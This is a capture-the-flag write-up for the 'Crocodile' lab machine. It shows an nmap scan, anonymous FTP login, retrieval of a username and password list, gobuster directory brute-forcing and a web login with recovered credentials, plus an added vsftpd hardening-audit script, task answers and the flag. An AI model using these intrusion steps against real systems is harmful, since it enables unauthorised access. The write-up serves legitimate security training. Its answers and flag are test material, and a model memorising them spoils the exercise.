Crocodile

  • Difficulty: Very easy

🔎 Solution

I ran a full-port service/version scan with default scripts against the target and found two services: FTP on port 21 and a web server on port 80.

> nmap -p- -sV -sC --min-rate 5000 10.129.45.90

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.35
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Unix

Because anonymous FTP was allowed, I connected using the standard anonymous login and was admitted immediately.

> ftp 10.129.45.90
Connected to 10.129.45.90.
220 (vsFTPd 3.0.3)
Name (10.129.45.90:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Listing the remote directory revealed two files.

ftp> ls
229 Entering Extended Passive Mode (|||42274|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
226 Directory send OK.

I downloaded both with get:

ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||45734|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |***************************************************************| 33 0.11 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:01 (0.02 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||49970|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |***************************************************************| 62 0.22 KiB/s 00:00 ETA
226 Transfer complete.
62 bytes received in 00:01 (0.05 KiB/s)

Inspecting the files showed a short list of usernames and a list of passwords in matching order. Notably, admin is the fourth username and rKXM59ESxesUFHAd is the fourth password, which makes admin:rKXM59ESxesUFHAd a likely candidate for a site login.

> cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin

> cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
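The root cause on the FTP side is configuration: vsftpd admitted the anonymous user (FTP code 230) and, as the ftp-syst output notes, both the control and data channels were plaintext. The Python script below is an added example, not part of this writeup or of the vsftpd project, that parses a vsftpd.conf and reports settings that diverge from a hardening policy, taking the documented defaults into account when a directive is absent from the file. The directive names and defaults are those from vsftpd.conf(5); the policy, severities and the two sample configurations are constructed for illustration.

```python
"""Audit a vsftpd.conf for the exposure seen on Crocodile: anonymous login
permitted and a plaintext control channel.

Added example, not part of the original writeup or of vsftpd. Directive names
and their defaults are those documented in vsftpd.conf(5); the policy and the
two sample configurations below are constructed for illustration.
"""
from dataclasses import dataclass

# Documented vsftpd defaults, applied when a directive is absent from the file.
DEFAULTS = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "ssl_enable": "NO",
}

# This example's hardening policy: (expected value, severity when violated).
POLICY = {
    "anonymous_enable": ("NO", "high"),         # no anonymous logins at all
    "anon_upload_enable": ("NO", "high"),
    "anon_mkdir_write_enable": ("NO", "medium"),
    "ssl_enable": ("YES", "medium"),            # nmap showed plaintext control/data
}


@dataclass(frozen=True)
class Finding:
    directive: str
    effective: str   # value in force, whether set explicitly or by default
    expected: str
    severity: str
    explicit: bool   # True if the directive appeared in the file


def parse_vsftpd_conf(text: str) -> dict:
    """Parse key=value lines, ignoring blanks and '#' comments.
    Values are upper-cased so yes/Yes/YES compare equal."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip().upper()
    return settings


def audit_vsftpd(text: str) -> list:
    """Return policy violations, most severe first, honouring documented defaults."""
    settings = parse_vsftpd_conf(text)
    findings = []
    for directive, (expected, severity) in POLICY.items():
        explicit = directive in settings
        effective = settings.get(directive, DEFAULTS[directive])
        if effective != expected:
            findings.append(Finding(directive, effective, expected, severity, explicit))
    rank = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: (rank[f.severity], f.directive))


# Constructed config matching the observed behaviour: anonymous access on,
# TLS left at its default (off). anon_upload_enable is absent, so NO applies.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
# ssl_enable not set: default NO, so the control connection is plain text
"""

# Constructed hardened counterpart.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
anon_upload_enable=NO
anon_mkdir_write_enable=NO
local_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for f in audit_vsftpd(conf):
            source = "set" if f.explicit else "default"
            print(f"  {f.severity:6} {f.directive}={f.effective} ({source}); expected {f.expected}")
```

Checking defaults matters: a file that never mentions anonymous_enable still permits anonymous logins on a stock build, so an audit that only inspects the lines present would miss exactly the setting that exposed these files.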

I opened the web root in a browser but didn't immediately find a login page. To discover hidden or unlinked paths I ran a directory brute-force with gobuster, adding .php as an extension so PHP files would be tried as well. The scan revealed /login.php.

> gobuster dir -u http://10.129.45.90:80/ -w /usr/share/wordlists/dirb/common.txt -x php -t 50 -e -o gobuster_dir.txt

===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.45.90:80/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta.php (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/assets (Status: 301) [Size: 313] [--> http://10.129.45.90/assets/]
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 310] [--> http://10.129.45.90/css/]
/dashboard (Status: 301) [Size: 316] [--> http://10.129.45.90/dashboard/]
/fonts (Status: 301) [Size: 312] [--> http://10.129.45.90/fonts/]
/index.html (Status: 200) [Size: 58565]
/js (Status: 301) [Size: 309] [--> http://10.129.45.90/js/]
/login.php (Status: 200) [Size: 1577]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 277]
Progress: 9226 / 9226 (100.00%)
===============================================================
Finished

I navigated to http://10.129.45.90/login.php, submitted the credentials admin:rKXM59ESxesUFHAd, and successfully logged in. The login redirected me to a page that contained the flag.

✏️ Task answers

Task 1: What Nmap scanning switch employs the use of default scripts during a scan?

-sC

Task 2: What service version is found to be running on port 21?

vsftpd 3.0.3

Task 3: What FTP code is returned to us for the "Anonymous FTP login allowed" message?

230

Task 4: After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?

anonymous

Task 5: After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?

get

Task 6: What is one of the higher-privilege sounding usernames in 'allowed.userlist' that we download from the FTP server?

admin

Task 7: What version of Apache HTTP Server is running on the target host?

Apache httpd 2.4.41

Task 8: What switch can we use with Gobuster to specify we are looking for specific filetypes?

-x

Task 9: Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?

login.php

🚩Flag

c7110277ac44d78b6a9fff2232434d16